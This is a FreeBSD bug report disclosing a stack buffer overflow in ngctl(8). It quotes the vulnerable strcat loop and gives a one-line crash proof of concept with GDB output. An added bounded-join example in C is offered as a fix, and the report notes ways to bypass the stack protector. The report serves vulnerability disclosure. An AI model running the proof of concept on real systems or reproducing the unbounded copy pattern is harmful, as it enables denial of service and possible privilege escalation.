https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=293075

            Bug ID: 293075
           Summary: Stack-based buffer overflow in ngctl(8)
           Product: Base System
           Version: 14.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: bin
          Assignee: [email protected]
          Reporter: [email protected]

Created attachment 267934
  --> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=267934&action=edit
ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')

Dear FreeBSD Security Team,
I am reporting a stack-based buffer overflow in ngctl(8) that allows any user
to crash the binary, which is typically executed as root, and potentially
exploit it for code execution.

I want to register a CVE for this memory corruption vulnerability.


Vulnerability Details

File: usr.sbin/ngctl/config.c (function ConfigCmd)
Buffer: char buf[NG_TEXTRESPONSE]; → NG_TEXTRESPONSE == 1024
Vulnerable code (still present in the current main branch, confirmed via cgit.freebsd.org):

char buf[NG_TEXTRESPONSE];     /* NG_TEXTRESPONSE == 1024 */
*buf = '\0';
for (i = 2; i < ac; i++) {
    if (i != 2)
        strcat(buf, " ");
    strcat(buf, av[i]);        /* <- NO BOUNDS CHECKING: av[i] is never measured against buf */
}
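A bounded way to build the same joined string, added here as an example; it is not code from the report or from FreeBSD's ngctl. join_args_bounded and demo_join are hypothetical names, and the argument sizes are constructed to mirror the PoC shape (two long arguments after "config dummy").

```c
#include <string.h>

#define NG_TEXTRESPONSE 1024   /* same size as buf in ngctl's ConfigCmd */

/* Hypothetical bounded replacement for the report's strcat() loop: joins
 * av[2..ac-1] with single spaces into buf (capacity bufsz), always NUL-
 * terminating. Returns the joined length, or -1 (buf left empty) if the
 * result plus its NUL would not fit. */
static int
join_args_bounded(char *buf, size_t bufsz, int ac, char **av)
{
    size_t used = 0;
    int i;

    if (bufsz == 0)
        return -1;
    buf[0] = '\0';
    for (i = 2; i < ac; i++) {
        size_t len = strlen(av[i]);
        size_t sep = (i != 2) ? 1 : 0;
        size_t room = bufsz - 1 - used;   /* bytes left before the NUL slot */

        if (sep + len > room) {           /* check BEFORE copying anything */
            buf[0] = '\0';
            return -1;
        }
        if (sep)
            buf[used++] = ' ';
        memcpy(buf + used, av[i], len);
        used += len;
        buf[used] = '\0';
    }
    return (int)used;
}

/* Constructed argv "config dummy <n_a x 'A'> <n_b x 'B'>" (n_a, n_b <= 1200),
 * returning what join_args_bounded() does with it into a 1024-byte buffer. */
static int
demo_join(size_t n_a, size_t n_b)
{
    static char big_a[1201], big_b[1201];
    char buf[NG_TEXTRESPONSE];
    char *av[] = { "config", "dummy", big_a, big_b };

    memset(big_a, 'A', n_a); big_a[n_a] = '\0';
    memset(big_b, 'B', n_b); big_b[n_b] = '\0';
    return join_args_bounded(buf, sizeof buf, 4, av);
}
```

With the PoC sizes (1200 and 1200) the join is refused instead of overrunning the stack; 511 and 511 fill the buffer exactly (1023 bytes plus NUL), and one byte more is refused.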


Proof of Vulnerability (PoC + GDB)
Reproduction (any FreeBSD 13/14/15-CURRENT):

ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')

Crash output:
textngctl: send msg: No such file or directory
Feb  9 18:39:10 hostname ngctl[980]: stack overflow detected; terminated
Abort trap (core dumped)


root@igor:~ # gdb ngctl -q
GEF for freebsd ready, type `gef' to start, `gef config' to configure
93 commands loaded and 5 functions added for GDB 15.1 [GDB v15.1 for FreeBSD] in 0.00ms using Python engine 3.11
Reading symbols from ngctl...
(No debugging symbols found in ngctl)
gef➤  r config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)')

[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────
registers ────
$rax   : 0x0
$rbx   : 0x000000080111e644  →  "stack overflow detected; terminated"
$rcx   : 0x00000008012152da  →  <getpid+000a> jb 0x801215178
$rdx   : 0x0
$rsp   : 0x00007fffffffcf88  →  0x00000008012188b0  →   mov edi, 0x7f
$rbp   : 0x00007fffffffcfd0  →  0x00007fffffffcfe0  →  0x00007fffffffd860  →  "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"
$rsi   : 0x6
$rdi   : 0x422
$rip   : 0x000000080121545a  →  <kill+000a> jb 0x801215178
$r8    : 0x0
$r9    : 0x0
$r10   : 0x0
$r11   : 0x000000080182d4a8  →  0x0032302d00544d4c ("LMT"?)
$r12   : 0x00000008012cb950  →  0x64a4d3bb4ddc49a0
$r13   : 0x4
$r14   : 0x00007fffffffcf90  →  0xffffffffffffffdf
$r15   : 0x2
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x43 $ss: 0x3b $ds: 0x3b $es: 0x3b $fs: 0x13 $gs: 0x1b
──────────────────────────────────────────────────────────────────────────────────────────────────────
stack ────
0x00007fffffffcf88│+0x0000: 0x00000008012188b0  →   mov edi, 0x7f        ← $rsp
0x00007fffffffcf90│+0x0008: 0xffffffffffffffdf   ← $r14
0x00007fffffffcf98│+0x0010: 0xffffffffffffffff
0x00007fffffffcfa0│+0x0018: 0x0000000000000000
0x00007fffffffcfa8│+0x0020: 0x0000000000000000
0x00007fffffffcfb0│+0x0028: 0x0000000000000000
0x00007fffffffcfb8│+0x0030: 0x0000000000000000
0x00007fffffffcfc0│+0x0038: 0x00007fffffffe497  →  0x414100796d6d7564 ("dummy"?)
────────────────────────────────────────────────────────────────────────────────────────────────
code:x86:64 ────
   0x801215450 <kill+0000>      mov    eax, 0x25
   0x801215455 <kill+0005>      mov    r10, rcx
   0x801215458 <kill+0008>      syscall
 → 0x80121545a <kill+000a>      jb     0x801215178      NOT taken [Reason: !(C)]
   0x801215460 <kill+0010>      ret
   0x801215461                  int3
   0x801215462                  int3
   0x801215463                  int3
   0x801215464                  int3
────────────────────────────────────────────────────────────────────────────────────────────────────
threads ────
[#0] Id 1, stopped 0x80121545a in kill (), reason: SIGABRT
──────────────────────────────────────────────────────────────────────────────────────────────────────
trace ────
[#0] 0x80121545a → kill()
[#1] 0x8012188b0 → mov edi, 0x7f
[#2] 0x801218820 → __stack_chk_fail()
[#3] 0x1026e9b → int3
──────────────────────

The overflow reaches the stack canary (and potentially saved return
address/ebp) → confirmed stack smash.

root@igor:~ # uname -a
FreeBSD igor 14.3-RELEASE FreeBSD 14.3-RELEASE releng/14.3-n271432-8c9ce319fef7
GENERIC amd64


Impact

DoS → any user with access to ngctl can crash it.
Code execution → root binary + stack overflow. SSP prevents simple ROP, but
bypasses exist (older builds, -fno-stack-protector, infoleak, etc.).
Common scenario: jails, monitoring scripts, or any system with netgraph
enabled.

I want to register a CVE for this memory corruption vulnerability.

Credits:
Author: Igor Gabriel Sousa e Souza
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/igo0r

Thanks!
